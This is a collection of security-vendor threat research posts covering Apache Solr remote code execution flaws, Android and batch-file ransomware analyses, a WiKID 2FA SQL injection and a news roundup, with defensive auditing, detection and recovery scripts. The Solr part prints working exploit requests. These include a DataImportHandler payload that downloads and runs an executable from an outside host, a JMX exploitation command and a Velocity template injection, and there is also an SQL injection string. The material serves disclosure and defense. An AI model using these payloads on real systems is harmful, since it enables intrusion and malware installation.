Apache Solr vulnerabilities bound to be attacked

What is Apache Solr?

Apache Solr is a fast, open-source Java search server. Solr lets you build search engines over websites, databases and files with little effort. It has been an industry staple for almost a decade and offers real-time indexing, dynamic clustering, load-balanced querying, replication, and automated failover and recovery. Internet giants such as Netflix, eBay, Instagram and Amazon use Solr for its ability to index and search across multiple sites.

Remote Code Execution Vulnerabilities:

CVE-2019-0193:

This vulnerability stems from the ability to configure the DataImportHandler remotely, by sending the configuration inside the request itself, via the "/solr/<core>/dataimport" URI. When such a request is received, the handleRequestBody() method of DataImportHandler is called, which leads to runCmd() being invoked with the request parameters as an argument. If the command HTTP parameter is set to full-import, doFullImport() is called, which in turn calls DocBuilder.execute(), causing the XML supplied in the dataConfig parameter to be evaluated. That XML may declare a <script> transformer whose JavaScript is run by the JVM's script engine, and the script can reach java.lang.Runtime and execute arbitrary commands as the Solr process.

Exploit:

A target running a vulnerable Solr version with the DataImportHandler enabled can be exploited with the request below; this payload fetches a second-stage executable with certutil and runs it.

POST /solr/test/dataimport HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referrer: http://XXXX:8983/solr/test/dataimport
User-Agent: Mozilla/4.0
Content-length:
Host: XXXX:8983

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process = java.lang.Runtime.getRuntime();
process.exec("cm d.exe /c certutil.exe -urlcache -split -f http://fk.0xbdairolkoie.space/download.exe %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe & cm d.exe /c %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe");
return row;
}
]]></script>
</dataConfig>

Mitigation:

Solr versions prior to 8.2.0 are affected. Updating to the latest version resolves the issue: from 8.2.0 the dataConfig request parameter is ignored unless the Java system property enable.dih.dataConfigParam is set to true, so do not set that property, and remove the DataImportHandler from solrconfig.xml on cores that do not need it.

CVE-2019-12409:

This vulnerability is due to an insecure setting for the ENABLE_REMOTE_JMX_OPTS option in the default solr.in.sh configuration file. If you use the default solr.in.sh from an affected release, JMX monitoring is enabled and exposed on RMI_PORT (default 18983) without any authentication. If that port is open to inbound traffic in your firewall, anyone with network access to your Solr nodes can connect to JMX, which in turn lets them load and execute malicious code on the Solr server, for example by using the MLet MBean to pull a JAR from an attacker-controlled web server.

Exploit:

If ENABLE_REMOTE_JMX_OPTS is set to "true", an attacker with network access to the RMI port can run code on the server with a publicly available JMX exploitation toolkit. The command below uses the MJET tool under Jython: host is the Solr node, 18983 the RMI port, and super_secret the password argument MJET takes for the MBean it installs.

java -jar jython-standalone-2.7.0.jar mjet.py host 18983 install super_secret

Mitigation:

Solr versions 8.1.1 and 8.2.0 for Linux are affected by this; the Windows start scripts are not.

Set ENABLE_REMOTE_JMX_OPTS to 'false' in the effective solr.in.sh on every Solr node and restart Solr, or update to the latest version.
Also block inbound traffic to the RMI port (18983 by default) at the firewall. If you genuinely need remote JMX, enable authentication and TLS on it rather than exposing it unauthenticated.


Zero day (CVE not yet assigned):

Apache Solr has a remote command execution vulnerability based on Velocity templates: the template text itself can be injected. An attacker only needs a core name on the Solr server (on an unauthenticated install the core list is available from the admin API); they first set params.resource.loader.enabled to true through the Config API, then supply a template in the request parameters that executes commands on the server.

Exploit:

Apache Solr ships the VelocityResponseWriter plug-in by default. Its params.resource.loader.enabled initialization parameter controls whether the "params" resource loader may take a template from the Solr request parameters; the default is false. An attacker can set params.resource.loader.enabled to true with a POST request to the Config API and then send a crafted GET request that achieves remote code execution on the Solr server.

The params.resource.loader.enabled initialization parameter of the VelocityResponseWriter is turned on with the following POST request to the Config API:

POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

The attacker then supplies a malicious template in the request parameters with the following GET request. URL-decoded, the v.template.custom value uses Velocity #set directives to reach java.lang.Runtime by reflection through $x.class.forName, runs the command id, and copies its output character by character into the response:

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: XXX:8983

Mitigation:

No fix from the vendor available yet.

Review the VelocityResponseWriter definition in each core's solrconfig.xml, ensure params.resource.loader.enabled is false (the default), and reload the core.
Also lock down the Config API, for example with Solr's authentication and authorization plugins (security.json) or a reverse proxy in front of port 8983, since an open Config API is what lets an attacker flip the setting in the first place; the Solr admin UI and APIs should never be reachable from untrusted networks.
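The three mitigations above can be checked mechanically. The Python script below is an added example, not code from SonicWall or the Solr project: it audits one core's Config API document and the node's solr.in.sh for the DataImportHandler, Velocity and JMX settings discussed here. It assumes the Config API returns {"config": {"requestHandler": {...}, "queryResponseWriter": {...}}} with each component's attributes and init params flattened into its entry (the same keys the Velocity POST above sets); the config document and solr.in.sh snippets are constructed samples, and on a live node you would fetch http://<host>:8983/solr/<core>/config for every core listed by /solr/admin/cores.

```python
import re

SAMPLE_CONFIG = {  # constructed stand-in for GET /solr/<core>/config
    "config": {
        "requestHandler": {
            "/select": {"name": "/select", "class": "solr.SearchHandler"},
            "/dataimport": {
                "name": "/dataimport",
                "class": "org.apache.solr.handler.dataimport.DataImportHandler",
                "defaults": {"config": "db-data-config.xml"},
            },
        },
        "queryResponseWriter": {
            "velocity": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "startup": "lazy",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            },
        },
    }
}
# constructed solr.in.sh fragments; the RMI_PORT line is commented out as in the shipped default
VULN_SOLR_IN_SH = 'SOLR_HEAP="512m"\nENABLE_REMOTE_JMX_OPTS="true"\n#RMI_PORT=18983\n'
SAFE_SOLR_IN_SH = 'SOLR_HEAP="512m"\nENABLE_REMOTE_JMX_OPTS="false"\n'

DIH_FIXED = (8, 2, 0)  # from 8.2.0 the dataConfig request parameter is ignored by default


def version_tuple(version):
    """'8.1.1' -> (8, 1, 1); tolerates suffixes such as '8.2.0-SNAPSHOT'."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])


def is_true(value):
    return str(value).strip().lower() == "true"


def audit_core_config(config, solr_version, dih_param_enabled=False):
    """Findings for one core. dih_param_enabled mirrors the Java system property
    enable.dih.dataConfigParam=true, which re-opens the CVE-2019-0193 path on
    patched releases."""
    findings = []
    cfg = config.get("config", {})
    for name, handler in cfg.get("requestHandler", {}).items():
        if "DataImportHandler" not in str(handler.get("class", "")):
            continue
        if version_tuple(solr_version) < DIH_FIXED or dih_param_enabled:
            findings.append(f"{name}: DataImportHandler accepts a dataConfig request parameter (CVE-2019-0193)")
        else:
            findings.append(f"{name}: DataImportHandler exposed; remove it from solrconfig.xml if unused")
    for name, writer in cfg.get("queryResponseWriter", {}).items():
        if "VelocityResponseWriter" not in str(writer.get("class", "")):
            continue
        if is_true(writer.get("params.resource.loader.enabled", "false")):
            findings.append(f"{name}: params.resource.loader.enabled=true lets a request carry its own Velocity template")
    return findings


def audit_solr_in_sh(text):
    """Findings for a solr.in.sh (CVE-2019-12409): JMX over RMI with no authentication."""
    m = re.search(r'^\s*ENABLE_REMOTE_JMX_OPTS\s*=\s*"?(\w+)"?', text, re.M)
    if not m or not is_true(m.group(1)):
        return []
    # '^\s*' means a commented-out '#RMI_PORT=...' line does not match, so the default applies
    port = re.search(r'^\s*RMI_PORT\s*=\s*"?(\d+)"?', text, re.M)
    shown = port.group(1) if port else "18983 (default)"
    return [f"ENABLE_REMOTE_JMX_OPTS=true: unauthenticated JMX exposed on RMI port {shown}"]


if __name__ == "__main__":
    for v in ("8.1.1", "8.2.0"):
        print(v, audit_core_config(SAMPLE_CONFIG, v))
    print(audit_solr_in_sh(VULN_SOLR_IN_SH))
```

The version check matters because the Config API looks identical before and after the 8.2.0 fix; only the Solr version (from /solr/admin/info/system) and the enable.dih.dataConfigParam property decide whether a registered DataImportHandler is exploitable through the request.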

Trend Chart:

At the time of writing we are not aware of in-the-wild attacks exploiting these vulnerabilities, but we have seen increasing scanning activity for ports 8983 and 18983 in the recent past. More widespread attacks on vulnerable Solr servers could be imminent.

 

Fig: Port activity taken from SANS Internet Storm Center: Port 8983

Fig: Port activity taken from SANS Internet Storm Center: Port 18983

Top IPs scanning port 8983:

185.153.197.5
51.38.162.236
159.203.201.236
159.203.201.19
159.203.201.84
159.203.201.64
211.159.219.162
125.64.94.221
194.61.24.102

SonicWALL Capture Labs Threat Research team provides protection against these threats with the following signatures:

IPS: 14096 Apache Solr Config API Insecure Deserialization
IPS: 14445 Apache Solr DataImportHandler Remote Code Execution 1
IPS: 14446 Apache Solr DataImportHandler Remote Code Execution 2
IPS: 14599 Apache Solr DataImportHandler Remote Code Execution 3
IPS: 14600 Apache Solr Config VelocityResponseWriter
IPS: 13036 Apache Solr Remote Code Execution 1
IPS: 13037 Apache Solr Remote Code Execution 2
IPS: 13287 Apache Solr DataImportHandler Information Disclosure
WAF: 1738 Apache Solr DataImportHandler Remote Code Execution
WAF: 1702 Apache Solr Config API Insecure Deserialization
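As a detection-side counterpart to the signatures listed above, here is an added example in Python (not SonicWall's signature logic and not Solr project code) that flags the three request shapes shown in this article: a dataConfig posted to /solr/<core>/dataimport, a Config API write that turns on params.resource.loader.enabled, and a wt=velocity query whose v.template.* parameter reaches into Java by reflection. The sample requests are constructed from the requests above with the command reduced to id; in practice the records would come from a reverse proxy or WAF log that retains request bodies, since plain access logs do not.

```python
import json
import re
from urllib.parse import parse_qs, urlencode, urlsplit

CORE_PATH = re.compile(r"^/solr/([^/]+)/(dataimport|config|select)$")
# Java reflection/exec primitives that have no place in a Velocity template or a DIH script
JAVA_REACH = re.compile(r"class\.forName|getRuntime|ProcessBuilder|getClassLoader|ScriptEngineManager", re.I)


def flag_request(method, url, body=""):
    """Findings for one request: method, path+query, and the raw body (form-encoded or JSON)."""
    parts = urlsplit(url)
    m = CORE_PATH.match(parts.path)
    if not m:
        return []
    core, endpoint = m.groups()
    params = parse_qs(parts.query, keep_blank_values=True)  # percent- and plus-decoded
    findings = []

    if endpoint == "dataimport":
        if method == "POST":
            params.update(parse_qs(body, keep_blank_values=True))
        command = params.get("command", [""])[0]
        data_config = params.get("dataConfig", [""])[0]
        if command.endswith("import") and "dataConfig" in params:
            findings.append(f"{core}: dataConfig supplied in the request (CVE-2019-0193 path)")
            if "<script" in data_config.lower() or JAVA_REACH.search(data_config):
                findings.append(f"{core}: inline <script> transformer reaching Java in dataConfig")

    elif endpoint == "config" and method == "POST":
        try:
            doc = json.loads(body)
        except ValueError:
            doc = {}
        for op, spec in (doc.items() if isinstance(doc, dict) else []):
            # covers both add-queryresponsewriter and update-queryresponsewriter
            if op.endswith("queryresponsewriter") and isinstance(spec, dict) \
                    and "VelocityResponseWriter" in str(spec.get("class", "")) \
                    and str(spec.get("params.resource.loader.enabled", "")).lower() == "true":
                findings.append(f"{core}: Config API {op} enabling params.resource.loader for '{spec.get('name')}'")

    elif endpoint == "select" and params.get("wt", [""])[0] == "velocity":
        for key, values in params.items():
            if key.startswith("v.template.") and any(JAVA_REACH.search(v) for v in values):
                findings.append(f"{core}: Velocity template injection via {key}")
    return findings


# Constructed sample traffic modelled on the three requests above (command reduced to 'id').
DIH_BODY = urlencode({
    "command": "full-import", "debug": "true", "dataConfig":
        '<dataConfig><dataSource type="URLDataSource"/><script><![CDATA['
        'function poc(row){ java.lang.Runtime.getRuntime().exec("id"); return row; }'
        ']]></script></dataConfig>'})
CONFIG_BODY = json.dumps({"update-queryresponsewriter": {
    "name": "velocity", "class": "solr.VelocityResponseWriter",
    "params.resource.loader.enabled": "true"}})
VELOCITY_URL = ("/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom="
                "%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))"
                "+%23set($ex=$rt.getRuntime().exec(%27id%27))")
BENIGN_URL = "/solr/test/select?q=*:*&wt=json&rows=10"

SAMPLE_REQUESTS = [
    ("POST", "/solr/test/dataimport", DIH_BODY),
    ("POST", "/solr/test/config", CONFIG_BODY),
    ("GET", VELOCITY_URL, ""),
    ("GET", BENIGN_URL, ""),
]


def scan(requests):
    """Run flag_request over (method, url, body) tuples; one findings list per request."""
    return [flag_request(m, u, b) for m, u, b in requests]


if __name__ == "__main__":
    for (method, url, _), hits in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(method, urlsplit(url).path, hits or "clean")
```

Matching on the decoded parameter values rather than on the raw URL is what keeps the Velocity rule robust: the same template can be sent with different percent-encodings, or in a POST body, and still decodes to the same class.forName string.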

Ginp Android malware steals sensitive user information

The SonicWall Threats Research Team observed reports of a new Android malware doing the rounds. The malware spies on the infected device and shows custom overlays on top of legitimate applications to steal credentials.

Infection Cycle

Among the permissions requested by the app, the following can give access to sensitive data or help the malware persist:

  • Read sms
  • Write sms
  • Send sms
  • Receive sms
  • Request install packages
  • Read contacts
  • System alert window
  • Write external storage
  • Receive boot completed

Upon execution, the malware requests Accessibility Services access and keeps prompting until the user grants it:

In the background the malware communicates with the server at 64.44.51.107, which is currently not active. As a result, only one-sided communication was observed during our analysis: the malware kept sending messages to the server without receiving replies.

Network Communication

The malware informs the server about the functions it executes via POST requests, with the executed function included as a parameter. Some examples follow:

  • When the malware asks for accessibility permissions:

  • The malware is hard to remove: it simulates a Back button press whenever the user navigates to Settings > Apps, and reports to the server each time the user tries:

 

  • We saw attempts to open a custom overlay when we tapped the Google Play app. Since the server was not active, the overlay itself was never downloaded, but we were still unable to open Google Play because the malware kept retrying the download.
  • The malware reports 'Starting CC Injection' to the server in the same format, indicating that it tries to show a credit-card overlay, as seen in a number of such overlay malware families:

 

  • At one stage a network packet containing all the functions executed during our analysis session was observed:

Garbage Code

Static analysis of this malware is impeded by presence of a large amount of garbage code:

Connected Apps

 

VirusTotal's graph shows multiple connected malicious apps that communicate with the same server and have functionality similar to the app analyzed here:

  • sing.guide.false
  • erode.jump.submit
  • solution.rail.forward
  • ethics.unknown.during
  • kgjapmy.lmdouzkomihupljyu.ahotdlfsfejferkznnwpos
  • park.rather.dance

Hard-coded Functions

A number of hard-coded functions are visible in the code which can be triggered via remote commands from the server:

  • killBot
  • setPingDelay
  • getAllSms
  • getAllContacts
  • disableAccessibility
  • enableAccessibility
  • startHiddenSMSActivity
  • stopHiddenSMSActivity
  • enableGrabber
  • disableGrabber
  • enableExtendedInject
  • disableExtendedInject
  • startPermissions
  • saveContacts
  • sendBulkSMS
  • apkUpdate
  • setNewUrl
  • sendInboxMessagesToServer
  • getInboxMessagesData

 

Overall, this malware attempts to steal sensitive information from the infected device by displaying overlays on top of legitimate apps.

 

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.Ginp.SV
  • AndroidOS.Ginp.IN

Indicators of Compromise:

  • 155009a186b939f050fcffbed42dcc2c38c953ea2f1b28c12d3d1a67151992a6
  • aa0d20f742fbcd80c950907381f61a3c04f79e83f8c65ddfdfd44f629b28b61e
  • 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea
  • 5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f
  • 1350ee16f82aa56504f33253ed678580e406d18b8f3307715bdfeaa6c06d4008
  • b4af05dac85e6640e684092f56ce455647d3eb29676c2cf52c5f3c751d2f51b4

BAT file based Ransomware targeting people in China

The SonicWall Capture Labs Threat Research Team has observed a BAT file related to CXK-NMSL V3.2 Ransomware targeting people in China.

The batch file uses a FOR loop to enumerate the files in each target directory. Each file is renamed with a ".cxkdata" suffix, then base64-encoded with "certutil -encode" into a new file with the .cxk_nmsl extension, after which the original is deleted.
Note that base64 is an encoding, not encryption: no key is involved, and the content of every .cxk_nmsl file can be recovered with "certutil -decode".
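Because the "encryption" is plain base64, the files can be restored without any key. The Python below is an added example (not the ransomware's code and not SonicWall's): it reproduces the certutil -encode file format (PEM-style header and footer, 64-character base64 lines with CRLF endings) so the decoder can be exercised offline, then walks a directory and writes each .cxk_nmsl file back out under its original name. The naming scheme name.ext.cxkdata.cxk_nmsl is an assumption built from the two suffixes described above; on a real victim, run it against a copy of the data and compare against certutil -decode on one file first.

```python
import base64
import tempfile
from pathlib import Path

RENAMED_SUFFIX = ".cxkdata"   # added by the batch file before encoding
ENCODED_SUFFIX = ".cxk_nmsl"  # extension of the certutil -encode output
PEM_BEGIN = "-----BEGIN CERTIFICATE-----"
PEM_END = "-----END CERTIFICATE-----"


def certutil_encode(data: bytes) -> bytes:
    """Mimic 'certutil -encode': PEM header/footer, 64-char base64 lines, CRLF line ends."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([PEM_BEGIN, *lines, PEM_END, ""]).encode("ascii")


def certutil_decode(blob: bytes) -> bytes:
    """Inverse of the above: drop the PEM lines and base64-decode the rest.
    validate=True makes a corrupted or truncated file raise instead of silently
    skipping bad bytes."""
    body = [ln.strip() for ln in blob.decode("ascii").splitlines()]
    body = [ln for ln in body if ln and not ln.startswith("-----")]
    return base64.b64decode("".join(body), validate=True)


def original_name(encoded_name: str) -> str:
    """'report.docx.cxkdata.cxk_nmsl' -> 'report.docx' (suffix order is an assumption)."""
    for suffix in (ENCODED_SUFFIX, RENAMED_SUFFIX):
        if encoded_name.endswith(suffix):
            encoded_name = encoded_name[: -len(suffix)]
    return encoded_name


def recover_directory(root: Path) -> list:
    """Decode every *.cxk_nmsl under root next to itself; returns the restored paths.
    The encoded files are left in place so a failed decode loses nothing."""
    restored = []
    for enc in sorted(root.rglob("*" + ENCODED_SUFFIX)):
        target = enc.with_name(original_name(enc.name))
        target.write_bytes(certutil_decode(enc.read_bytes()))
        restored.append(target)
    return restored


def demo_roundtrip() -> dict:
    """Stage two constructed victim files in a temp dir, 'encrypt' them the way the
    batch file does, recover them, and return {original name: recovered bytes}."""
    samples = {"notes.txt": b"quarterly numbers\r\n", "photo.jpg": bytes(range(256)) * 4}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, data in samples.items():
            (root / (name + RENAMED_SUFFIX + ENCODED_SUFFIX)).write_bytes(certutil_encode(data))
        return {p.name: p.read_bytes() for p in recover_directory(root)}


if __name__ == "__main__":
    for name, data in demo_roundtrip().items():
        print(name, len(data), "bytes recovered")
```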

The Ransomware encodes files found in the following locations:

• %SystemDrive%\
• %UserProFile%\
• %UserProFile%\Desktop\
• %UserProFile%\Downloads\
• %UserProFile%\Favorites\
• %UserProFile%\Searches\
• %UserProFile%\Saved Games\
• %UserProFile%\Contacts\
• %UserProFile%\Links\
• %UserProFile%\Videos\
• %UserProFile%\Pictures\
• %UserProFile%\Documents\
• %UserProFile%\Music\

The batch file also contains a base64-encoded PE file, which is written to disk as "X".

The file "X" is then decoded with the certutil command shown below and saved to disk:

The PE file tries to load the krnln.fnr DLL (the core runtime library of the Easy Programming Language, 易语言) and call its "GetNewSock" API, which provides remote-administration capabilities.

It also contains a base64-encoded zip file holding wallpaper.jpg.

Wallpaper.jpg

It creates a .JS file that decodes the base64-encoded wallpaper.jpg.

It also creates a VBS file that displays a message box in Chinese.

It modifies the registry to set the desktop wallpaper to its own wallpaper.jpg.

It then executes the command below, the usual way to refresh the wallpaper without the user logging off and back on.

The ransom note is in Chinese; it asks the victim to pay 100 B coins (the virtual currency of the bilibili video site) and directs the user to the site below for more information about them.

https://www.bilibili.com/blackboard/help.htmlprice.

Ransomware note

Finally, it drops an MP3 file and plays the song.

Sonicwall Capture Labs provides protection against this threat with the following signature:

  • GAV: Ransom.BatCXK_NMSL (Trojan)

Indicators of Compromise:

  • 01b575a1012b97988655980a48430dbb

Debug build of Jigsaw Ransomware contains SMTP email credentials

The SonicWall Capture Labs Threat Research Team observed reports of a new version of the Jigsaw ransomware.  The version analysed here appears to be an early debug build and sports a new interface, a significant departure from interfaces using clown images in previous versions.  As this is a test version of the malware, no encryption actually takes place.

Infection Cycle:

The malware executable file contains the following metadata:

Upon execution it displays the following messagebox:

It brings up the following dialog:

 

The “View encrypted files” button brings up the following page:

 

The following files are added to the system:

  • %APPDATA%\SkinSoft\VisualStyler\2.4.59444.6\x86\ssapihook.dll
  • {run location}\EncryptedFileList.txt
  • {run location}\FileSystemSimulation\NotTxtTest.nottxt
  • {run location}\FileSystemSimulation\TxtTest.txt.die (empty file)
  • {run location}\Newtonsoft.Json.dll
  • {run location}\SkinSoft.VisualStyler.dll

 

NotTxtTest.nottxt contains the following text:

I am NOT a txt test.

 

EncryptedFileList.txt contains the following text:

{run location}\FileSystemSimulation\TxtTest.txt

 

Nothing is actually encrypted on the system.  Presumably, this is because it is a debug version.

 

The malware executable file contains the following string:

  • C:\Users\Moises\Desktop\jigsawransomware2019-master\JigsawRansomware\obj\Debug\JigsawRansomware.pdb

 

The malware makes the following DNS requests:

  • hostas8.cf
  • google-analytics.com
  • ip-api.com
  • osdsoft.com

 

The following network traffic was observed between the malware and the hosts listed above:

 

A further look into the executable file reveals credentials for 1455 SMTP email accounts:

 

The BTC address (3DCMs9XgBi6HDigyPggqhrpMYuwp3d81rM) has some transaction history.  However, it is not certain whether or not the transactions are directly related to ransom payments:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Jigsaw.RSM_26 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

WiKID Enterprise 2FA Server SQL Injection Vulnerability

WiKID Enterprise 2FA (two-factor authentication) Server through 4.2.0-b2047 is vulnerable to SQL injection through the searchDevices.jsp endpoint (CVE-2019-16917).

WiKID Enterprise 2FA
WiKID 2FA (two-factor authentication) Enterprise Server is an authentication system that works with services such as RADIUS servers, LDAP directories and AD domain servers to provide two-factor authentication for enterprise environments. It offers features such as handling two-factor authentication requests and validation, passcode requests, user management, certificate management, and administrative preferences.

SQL injection
A SQL injection attack consists of inserting, or "injecting", SQL via the input data sent from the client to the application. A successful exploit can read sensitive data from the database, modify data (insert/update/delete) and, depending on the database, run additional stacked statements.

The Vulnerability (CVE-2019-16917)
A SQL injection vulnerability exists in WiKID Enterprise 2FA: the uid and domain parameters are not sanitized before the SQL query is constructed in the buildSearchWhereClause function. The WiKID Enterprise server provides a graphical administration interface at "https://<server>/WiKIDAdmin/".

Looking at the buildSearchWhereClause function of searchDevices.jsp, the uid and domain parameters are concatenated directly into the SQL query without validation or escaping, which makes the function vulnerable to SQL injection.

The backend database is PostgreSQL, which accepts stacked queries, so an injected statement is not limited to altering the original SELECT. One example attack makes the database sleep for 10 seconds, a time-based probe that confirms the injection without needing any data in the response.

This vulnerability is patched. Comparing the patched code with the vulnerable code, the patched searchDevices.jsp uses a PreparedStatement with the uid and domain values bound as parameters instead of concatenating them into the query. Prepared statements keep the query structure fixed, so an attacker cannot change the intent of the query even if SQL syntax is present in the input.
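The two patterns the advisory contrasts, as an added example rather than WiKID's own JSP code: a buildSearchWhereClause that concatenates uid and domain into the query, beside a version that binds them as parameters. Python's sqlite3 stands in for the PostgreSQL/JDBC stack so the example runs offline; the device rows and the function names are constructed for the demo. sqlite3's execute() refuses a second statement, so the stacked time-based probe described above cannot run here, but the tautology payload shows the same loss of control over the query's intent, and on PostgreSQL through a JDBC Statement the identical concatenation would also execute the stacked statement.

```python
import sqlite3

# Constructed device table standing in for WiKID's device store (sample rows, not product data).
DEVICES = [("alice", "corp", "SN-0001"), ("bob", "corp", "SN-0002"), ("carol", "lab", "SN-0003")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (uid TEXT, domain TEXT, serial TEXT)")
    conn.executemany("INSERT INTO devices VALUES (?, ?, ?)", DEVICES)
    return conn


def build_search_where_clause_unsafe(uid, domain):
    """Hypothetical reconstruction of the vulnerable pattern: user input is
    concatenated straight into the WHERE clause (this is not WiKID's code)."""
    clauses = []
    if uid:
        clauses.append("uid = '" + uid + "'")
    if domain:
        clauses.append("domain = '" + domain + "'")
    return (" WHERE " + " AND ".join(clauses)) if clauses else ""


def search_devices_unsafe(conn, uid, domain):
    sql = "SELECT uid, domain, serial FROM devices" + build_search_where_clause_unsafe(uid, domain)
    return conn.execute(sql).fetchall()


def build_search_where_clause_safe(uid, domain):
    """Fixed pattern: the clause keeps placeholders, the values travel separately,
    so the database never parses user input as SQL."""
    clauses, params = [], []
    if uid:
        clauses.append("uid = ?")
        params.append(uid)
    if domain:
        clauses.append("domain = ?")
        params.append(domain)
    return ((" WHERE " + " AND ".join(clauses)) if clauses else ""), params


def search_devices_safe(conn, uid, domain):
    where, params = build_search_where_clause_safe(uid, domain)
    return conn.execute("SELECT uid, domain, serial FROM devices" + where, params).fetchall()


# A tautology in the domain parameter: the unsafe query becomes
#   ... WHERE uid = 'nobody' AND domain = 'x' OR '1'='1'
# and AND binds tighter than OR, so every row matches.
PAYLOAD = "x' OR '1'='1"


def demo():
    """Row counts for a legitimate search and for the payload, both code paths."""
    conn = make_db()
    return {
        "legit_safe": len(search_devices_safe(conn, "alice", "corp")),
        "legit_unsafe": len(search_devices_unsafe(conn, "alice", "corp")),
        "payload_unsafe": len(search_devices_unsafe(conn, "nobody", PAYLOAD)),
        "payload_safe": len(search_devices_safe(conn, "nobody", PAYLOAD)),
    }


if __name__ == "__main__":
    print(demo())  # {'legit_safe': 1, 'legit_unsafe': 1, 'payload_unsafe': 3, 'payload_safe': 0}
```

The safe version returns zero rows for the payload because the bound value is compared literally: the database is looking for a domain whose name is the string x' OR '1'='1, which does not exist.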

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:
IPS: 14569 WiKID Enterprise 2FA SQL Injection
IPS: SQL Injection Attack
SonicWall WAF has been designed to provide protection against this exploit by default.

Cyber Security News & Trends

This week, SonicWall is looking for Beta Testers for the SonicWall Community, Ransomware-as-a-Service is put under the spotlight, and Disney+ accounts are hacked only hours after going live.


SonicWall Spotlight

SonicWall Leads Series A Round Funding in Zero-Trust Security Provider Perimeter 81 – SonicWall Press Release

  • SonicWall has signed a commercial agreement for the development of joint solutions with Perimeter 81. This agreement means that we are able to provide a wide range of businesses, from SMBs to Fortune 500s and governments, with SonicWall’s award-winning Capture Cloud Platform and real-time breach detection and prevention solutions, while also allowing them to adopt a zero-trust security architecture that delivers tremendous efficacy in securing the modern organization.

Call for Beta Testers – The SonicWall Community

  • SonicWall is delighted to announce that it will be launching the SonicWall Community in 2020. The community will be a place where our customers, partners and product experts can collaborate to share knowledge, experiences, resources and opinions. Do register your interest if you want to be a beta tester for our pilot community.

The CyberWire Daily Podcast – The Cyberwire

  • The CyberWire Daily Podcast rounds up the cybersecurity news each day and SonicWall CEO Bill Conner makes an appearance on Thursday 21st of November, discussing the Q3 threat intelligence data from SonicWall Capture Labs.

Ransomware-as-a-Service: SaaS for Cyber Criminals – SC Magazine (UK)

  • Ransomware’s simplicity and lucrativeness as a form of cyberattack has led to a growth in what is known as Ransomware-as-a-Service – a user-friendly version of ransomware that can easily be deployed with minimal technical knowledge. SonicWall CEO Bill Conner explains how it works, why it is so popular, and how to fight it in SC Magazine.

Cybersecurity News

1.2 Billion Records Found Exposed Online in a Single Server – Wired

  • A researcher has found a database containing over a billion records on an easily accessed, unsecured server. The data does not contain passwords or financial information, but does contain phone numbers, social profiles, and work histories of the huge number of those affected.

Thousands of Hacked Disney+ Accounts Are Already for Sale on Hacking Forums – ZDNet

  • Hackers hijacked Disney+ accounts and put them up for sale within hours of the service launching this week. Prices for account details range from $3 to $11 on online forums, compared with a legitimate subscription that costs $7 a month.

WhatsApp Remote Code Execution Triggered by Videos – Threat Post

  • A vulnerability in WhatsApp was discovered and quietly patched this week. The flaw would allow an attacker to compromise a user simply by sending them a crafted MP4 file over WhatsApp. There is no evidence that it was exploited in the wild before the patch shipped.

Attacks on Healthcare Jump 60% in 2019 – so Far – Dark Reading

  • A new report has named the healthcare system as the seventh-most targeted industry by malware, but also an industry that is still dragging its heels when it comes to preparedness, with a large number of legacy hardware and software systems still in use.

Financial Advisors Need to Put Cybersecurity Plans to the Test – CNBC

  • The U.S. Securities and Exchange Commission has released cybersecurity guidance for financial advisory firms. The simple message of this notice is that no firm is too small to have cybersecurity protections in place, and no firm should be so confident in their systems that they do not regularly test them.

And Finally

Influencer Marketing Comes to Cybersecurity – Axios

  • Perhaps it was only a matter of time, but the popular culture world of influencers has finally caught up with the usually more scientific world of cybersecurity. Eagle-eyed watchers of social-media have noticed an uptick in follower-rich cybersecurity Twitter accounts running individualized adverts. Other popular accounts have since come out and denounced accepting payments for adverts as unethical in the world of cybersecurity.

In Case You Missed It

AnteFrigus ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research Team observed reports of a new variant of the ANTEFRIGUS ransomware family [ANTEFRIGUS.RSM] actively spreading in the wild.

The ANTEFRIGUS ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\<Random>-readme.TXT (instructions for recovery)
    • %App.path%\[Name].<Random> (encrypted files)

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends a random extension to each encrypted file's filename.

